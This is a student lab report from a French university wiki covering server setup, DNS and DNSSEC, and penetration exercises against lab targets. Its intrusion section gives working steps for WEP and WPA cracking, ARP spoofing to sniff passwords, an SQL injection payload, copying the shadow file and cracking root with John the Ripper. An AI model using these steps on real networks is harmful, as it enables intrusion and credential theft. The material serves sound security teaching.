   up ip route add default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
   down ip address del dev eth0 100.64.0.28/24&lt;br /&gt;
   down ip route del default via 100.64.0.2 src 193.48.57.188&lt;br /&gt;
&lt;br /&gt;
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:&lt;br /&gt;
 ssh pifou@zabet09.plil.info&lt;br /&gt;
Et ensuite via minicom:&lt;br /&gt;
 minicom -os /dev/ttyACM0&lt;br /&gt;
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28 &lt;br /&gt;
&lt;br /&gt;
Nous avons désormais accès à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.&lt;br /&gt;
&lt;br /&gt;
==4.1  Serveur SSH (02/11/2020)==&lt;br /&gt;
Le service SSH était activé par defaut.&lt;br /&gt;
Il faut juste autoriser la connexion en root dans le fichier /etc/ssh/sshd_config&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
puis systemctl restart sshd&lt;br /&gt;
&lt;br /&gt;
et on peut se connecter a notre vm&lt;br /&gt;
 ssh root@193.48.57.188&lt;br /&gt;
&lt;br /&gt;
==4.2  Serveur DNS (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Pour commencer dans le fichier de configuration /etc/resolv.conf nous avons mis comme adresse de serveur de nom &lt;br /&gt;
 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local, en suivant le cours nous avons modifié et/ou ajouté:&lt;br /&gt;
 options{&lt;br /&gt;
 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32 ;&lt;br /&gt;
&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite avec bind9 nous avons pu configurer notre serveur de nom.&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.local nous avons défini notre zone &amp;quot;trompettedelamort.site&amp;quot;:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
Puis nous avons configuré le fichier db.trompettedelamort.site. Pour se faire nous avons pris le fichier par defaut db.local que nous avons copié puis modifié:&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.trompettedelamort.site.  postmaster.trompettedelamoo&lt;br /&gt;
 rt.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.trompettedelamort.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.188&lt;br /&gt;
&lt;br /&gt;
Enfin sur gandi.net nous avons crée un glue record dans lequel nous avons mis l'adresse ip de notre machine virtuelle puis nous avons ajouté dans Nameservers. &lt;br /&gt;
ns6.gandi.net possedant déjà son glue record, nous avons simplement ajouté ce dernier dans Nameservers.&lt;br /&gt;
&lt;br /&gt;
==4.3  Sécurisation de site web par certificat (pas encore fait)==&lt;br /&gt;
&lt;br /&gt;
==4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020)==&lt;br /&gt;
&lt;br /&gt;
La configuration a été réalisé en suivant les instructions dans le sujet de TP rubrique : 4.4  Sécurisation de serveur DNS par DNSSEC&lt;br /&gt;
&lt;br /&gt;
Premièrement nous avons modifié le ficher named.conf.options pour y ajouter l'options suivantes:&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite crée un repertoir trompettedelamort.dnssec afin d'y générer les clefs. Nous devons générer une paire de clef KSK et une paire de clef ZSK.&lt;br /&gt;
&lt;br /&gt;
Pour créer la paire de clef KSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Et pour la paire de clef ZSK, nous utilisons la commande suivante:&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE trompettedelamort.site&lt;br /&gt;
&lt;br /&gt;
Nous renommons ces paires avec comme prefixe trompettedelamort.site et comme suffice -zsk pour la paire zsk et -ksk pour la paire ksk et nous terminon avec .key pour les clefs publiques et .private pour les clefs privées.&lt;br /&gt;
&lt;br /&gt;
Ensuite dans notre fichier zone db.trompettedelamort.site nous ajoutons les lignes suivantes sans oublier d'incrémenter le  Serial:&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.dnssec/trompettedelamort-zsk.key&lt;br /&gt;
&lt;br /&gt;
Le fichier db.trompettedelamort.site ressemble donc à cela:&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @ 	IN	SOA	 ns1.trompettedelamort.site.  postmaster.trompettedelamort.site.(&lt;br /&gt;
&lt;br /&gt;
			      8		; Serial&lt;br /&gt;
			 604800		; Refresh&lt;br /&gt;
			  86400		; Retry&lt;br /&gt;
			2419200		; Expire&lt;br /&gt;
			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.trompettedelamort.site.&lt;br /&gt;
 @	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @	IN	MX	100 ns1.trompettedelamort.site.&lt;br /&gt;
 ns1	IN	A       193.48.57.188&lt;br /&gt;
 www	IN	A	193.48.57.188	&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key&lt;br /&gt;
 $include /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les enregristrement de la zone avec la commande suivante:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53849</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=53849"/>
				<updated>2020-11-16T23:08:04Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
